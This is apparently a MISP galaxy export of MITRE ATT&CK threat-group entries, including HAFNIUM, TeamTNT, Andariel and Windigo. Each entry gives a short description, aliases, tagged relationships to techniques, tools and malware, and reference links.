https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/

CostaRicto - G0132

[CostaRicto](https://attack.mitre.org/groups/G0132) is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. [CostaRicto](https://attack.mitre.org/groups/G0132)'s targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.(Citation: BlackBerry CostaRicto November 2020)

The tag is: misp-galaxy:mitre-intrusion-set="CostaRicto - G0132"

CostaRicto - G0132 is also known as:

CostaRicto

View relationships graph

CostaRicto - G0132 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tor - S0183" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PS1 - S0613" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CostaBricks - S0614" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SombRAT - S0615" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4574. Table References
Links
https://attack.mitre.org/groups/G0132
https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

Windigo - G0124

The [Windigo](https://attack.mitre.org/groups/G0124) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://attack.mitre.org/software/S0377) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://attack.mitre.org/groups/G0124) operators continued updating [Ebury](https://attack.mitre.org/software/S0377) through 2019.(Citation: ESET Windigo Mar 2014)(Citation: CERN Windigo June 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Windigo - G0124"

Windigo - G0124 is also known as:

Windigo

View relationships graph

Windigo - G0124 has relationships with:

uses: misp-galaxy:mitre-malware="Ebury - S0377" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4575. Table References
Links
https://attack.mitre.org/groups/G0124
https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/
https://security.web.cern.ch/advisories/windigo/windigo.shtml

HAFNIUM - G0125

[HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)

The tag is: misp-galaxy:mitre-intrusion-set="HAFNIUM - G0125"

HAFNIUM - G0125 is also known as:

HAFNIUM
Operation Exchange Marauder

View relationships graph

HAFNIUM - G0125 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1583.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ASPXSpy - S0073" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="IP Addresses - T1590.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 4576. Table References
Links
https://attack.mitre.org/groups/G0125
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

Higaisa - G0126

[Higaisa](https://attack.mitre.org/groups/G0126) is a threat group suspected to have South Korean origins. [Higaisa](https://attack.mitre.org/groups/G0126) has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. [Higaisa](https://attack.mitre.org/groups/G0126) was first disclosed in early 2019 but is assessed to have operated as early as 2009.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Higaisa - G0126"

Higaisa - G0126 is also known as:

Higaisa

View relationships graph

Higaisa - G0126 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"

Table 4577. Table References
Links
https://attack.mitre.org/groups/G0126
https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/
https://www.zscaler.com/blogs/security-research/return-higaisa-apt
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/

ZIRCONIUM - G0128

[ZIRCONIUM](https://attack.mitre.org/groups/G0128) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.(Citation: Microsoft Targeting Elections September 2020)(Citation: Check Point APT31 February 2021)

The tag is: misp-galaxy:mitre-intrusion-set="ZIRCONIUM - G0128"

ZIRCONIUM - G0128 is also known as:

ZIRCONIUM
APT31

View relationships graph

ZIRCONIUM - G0128 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 4578. Table References
Links
https://attack.mitre.org/groups/G0128
https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/
https://research.checkpoint.com/2021/the-story-of-jian/

BackdoorDiplomacy - G0135

[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) is a cyber espionage threat group that has been active since at least 2017. [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.(Citation: ESET BackdoorDiplomacy Jun 2021)

The tag is: misp-galaxy:mitre-intrusion-set="BackdoorDiplomacy - G0135"

BackdoorDiplomacy - G0135 is also known as:

BackdoorDiplomacy

View relationships graph

BackdoorDiplomacy - G0135 has relationships with:

uses: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1588.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Turian - S0647" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 4579. Table References
Links
https://attack.mitre.org/groups/G0135
https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

IndigoZebra - G0136

[IndigoZebra](https://attack.mitre.org/groups/G0136) is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)

The tag is: misp-galaxy:mitre-intrusion-set="IndigoZebra - G0136"

IndigoZebra - G0136 is also known as:

IndigoZebra

View relationships graph

IndigoZebra - G0136 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BoxCaon - S0651" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="xCaon - S0653" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002" with estimative-language:likelihood-probability="almost-certain"

Table 4580. Table References
Links
https://attack.mitre.org/groups/G0136
https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html
https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/
https://securelist.com/apt-trends-report-q2-2017/79332/

Andariel - G0138

[Andariel](https://attack.mitre.org/groups/G0138) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://attack.mitre.org/groups/G0138) has primarily focused its operations—which have included destructive attacks—against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://attack.mitre.org/groups/G0138)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)(Citation: CrowdStrike Silent Chollima Adversary September 2021)

[Andariel](https://attack.mitre.org/groups/G0138) is considered a sub-set of [Lazarus Group](https://attack.mitre.org/groups/G0032), and has been attributed to North Korea’s Reconnaissance General Bureau.(Citation: Treasury North Korean Cyber Groups September 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Andariel - G0138"

Andariel - G0138 is also known as:

Andariel
Silent Chollima

View relationships graph

Andariel - G0138 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Malware - T1588.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Rifdoor - S0433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software - T1592.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="IP Addresses - T1590.005" with estimative-language:likelihood-probability="almost-certain"

Table 4581. Table References
Links
https://attack.mitre.org/groups/G0138
https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do
http://www.issuemakerslab.com/research3/
AnalysisAndariel_Group.pdf[AnalysisAndariel_Group.pdf]
https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html
https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/
https://home.treasury.gov/news/press-releases/sm774

TeamTNT - G0139

[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. (Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021)

The tag is: misp-galaxy:mitre-intrusion-set="TeamTNT - G0139"

TeamTNT - G0139 is also known as:

TeamTNT

View relationships graph

TeamTNT - G0139 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scanning IP Blocks - T1595.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Upload Malware - T1608.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Hildegard - S0601" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="MimiPenguin - S0179" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 4582. Table References
Links
https://attack.mitre.org/groups/G0139
https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/
https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/
https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/
https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/
https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf
https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera
